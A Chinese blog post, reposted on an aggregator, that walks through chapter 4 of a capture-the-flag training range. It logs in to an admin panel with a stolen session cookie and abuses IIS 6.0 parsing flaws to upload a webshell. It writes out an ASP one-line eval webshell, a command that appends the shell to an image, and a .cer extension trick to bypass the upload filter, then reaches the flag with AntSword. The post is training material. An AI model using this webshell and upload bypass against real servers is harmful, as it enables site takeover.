封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

这篇具有很好参考价值的文章主要介绍了封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

封神台 https://hack.zkaq.cn

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)一、1.通过修改Cookie登录后台(没用重打)

        2,上传SHELL!3,Flag在网站根目录(flag.php)

        3.上传图片时建议上传小文件,建议用QQ表情
        尤里通过XSS终于得到了管理员Cookie,在修改了cookie后尤里直接绕过了登录密码,
        看到了后台功能!然后要做的,就是找一个上传点,上传自己的外壳了!

一.开始 

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

 这是用上一章XSS的cookie     用bp抓包也可以

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC

 复制粘贴即可封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

 点击准备好了吗或者f5刷新进入网页

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

二、分析Microsoft-IIS/6.0

可能存在IIS解析漏洞:

    1.目录解析 以*.asp命名的文件夹里的文件都将会被当成ASP文件执行。
    2.文件解析 对于 *.asp;.jpg 像这种畸形文件名在";"后面的直接被忽略,也就是说当成 *.asp文件执行。
    3.IIS6.0 默认的可执行文件除了asp还包含这三种 *.asa *.cer *.cdx。

1.查看上传目录 和上传文件限制

 系统管理 网站配置封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

 封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

2.确定上传点

添加下载程序和添加产品都可

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

 三、生成木马、上传木马

注意

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

流程:  图片 ----生成、植入木马---木马图片---以.cer上传----蚁剑----找到目录flag

 封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

1.找一张空间较小的图片

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

2. 以万能的txt记事本打开

发现是乱码 正常

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

3.写个txt 改后缀名为php(网页)

        mm.txt里面写一句话木马 

        简单的  eval: 执行    request:从用户那里取得的信息   木马:执行从用户那里取得的信息

<%eval request ("a")%>

4. 复制生成带有木马的图片

copy 1.jpg/b+mm.php 2.jpg
#复制 原图片/b+木马.php #新图片

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

 封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

4.用记事本查看木马图片

末尾发现一句话木马代表成功生成

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

5.改文件后缀名2.jpg改为2.cer 上传

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

 封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

 复制到url 封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

6. 在蚁剑添加这个网址

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

 直接打开FLAG!.txt

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

 拿到flag  zkz{G3t_the_admin!Sh3ll}文章来源地址https://www.toymoban.com/news/detail-470089.html

到了这里,关于封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 小黑子—spring:第四章 事务控制与整合web环境

    事务是开发中必不可少的东西,使用JDBC开发时,我们使用connnection对事务进行控制,使用MyBatis时,我们使用SqlSession对事务进行控制,缺点显而易见,当我们切换数据库访问技术时,事务控制的方式总会变化,Spring 就将这些技术基础上,提供了统一的控制事务的接口。Spring的

    2024年02月06日
    浏览(40)
  • 第四章——数学知识1

    质数:在大于1的整数中,如果只包含1和本身这俩个约束,就被叫质数或素数。 质数的判定——试除法:如果d能整除n,则n/d再除n,结果是一个整数。 d≤n/d。 质因数:一个正整数的俩个因数都是质数 分解质因数——试除法: 从小到大枚举所有的质因数,这里我们要的是质

    2023年04月26日
    浏览(44)
  • linux第四章(网络)

    在配置前首先查看本机的ensXX信息:cat ens160.nmconnection 看本机配置:cd /etc/NetworkManager/                       cd  system-connextions/    ls 一。接口管理命令:ip命令/nmcli命令/nmtui命令 1.对IP地址进行操作: ip的命令: IP link:显示网络设备的运行状态 ip -s show ens160:查看设备(en

    2024年01月19日
    浏览(50)
  • 计网:第四章 网络层

    基于湖科大教书匠b站计算机网络教学视频以及本校课程老师ppt 整合出的计算机网络学习笔记 根据文章目录,具体内容都在附赠的pdf文件中,适合日常学习、考前冲刺 一下是第四章笔记中大概的知识点内容,欢迎查漏补缺^^ 可以在电脑网页端进行下载哦~ 目录 1.网络层概述

    2024年01月24日
    浏览(70)
  • 第四章 Text

    在本章中,您将学习如何在页面上绘制文本。 绘图文本是 PDF 图形中最复杂的部分,但它也是帮助 PDF 击败竞争对手成为当今国际标准的原因。 当其他原始播放器将文本转换为光栅图像或矢量路径(以保持视觉完整性)时,PDF 的发明者知道用户需要可以搜索和复制的文本,而

    2024年02月06日
    浏览(46)
  • 四,Eureka 第四章

           2.3.4修改主启动类 标注为Eureka客户端           springcloud-eureka-sever-7001 springcloud-eureka-sever-7001   springcloud-eureka-sever003           5.25编写PaymentMapper接口   5.    

    2024年02月15日
    浏览(82)
  • 第四章 单例模式

    代码示例 优缺点:可能会造成内存的浪费,但也只能浪费内存 代码示例 代码示例 缺点:多线程不安全 缺点效率太低 在类加载时,静态内部类没有调用是不会进行类加载的,当被调用时才会被加载,而且只加载一次,加载时线程安全 优缺点

    2023年04月21日
    浏览(56)
  • 第四章-边界安全

    1)什么是防火墙 墙,始于防,忠于守。从古至今,墙予人以安全之意。 防御外网对内网的入侵 防火墙是一种 网络安全设备或系统 ,用于监控和控制网络流量,防止未经授权的访问和攻击。防火墙可以根据预定的规则和策略,过滤入站和出站数据包,保护网络的安全性和完

    2024年01月19日
    浏览(50)
  • 第四章网关

    Spring Cloud Gateway 是 Spring Cloud 的一个全新项目,该项目是基于 Spring 5.0,Spring Boot 2.0 和 Project Reactor 等响应式编程和事件流技术开发的网关,它旨在为微服务架构提供一种简单有效的统一的 API 路由管理方式。 Gateway网关是我们服务的守门神,所有微服务的统一入口。 网关的核

    2024年02月10日
    浏览(53)
  • 第四章 数组

    可以多看几遍视频 把上课的代码,自己加加注释,在自己写之前,可以画一个流程图 照着流程图把代码自己实现一遍 不要怀疑自己,不要遇到困难就觉得自己不行,遇到困难就解决困难,编程初学者都是这样一步一步走过来的。 在指针阶段会演示整型、浮点型、字符型传递

    2024年02月12日
    浏览(46)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包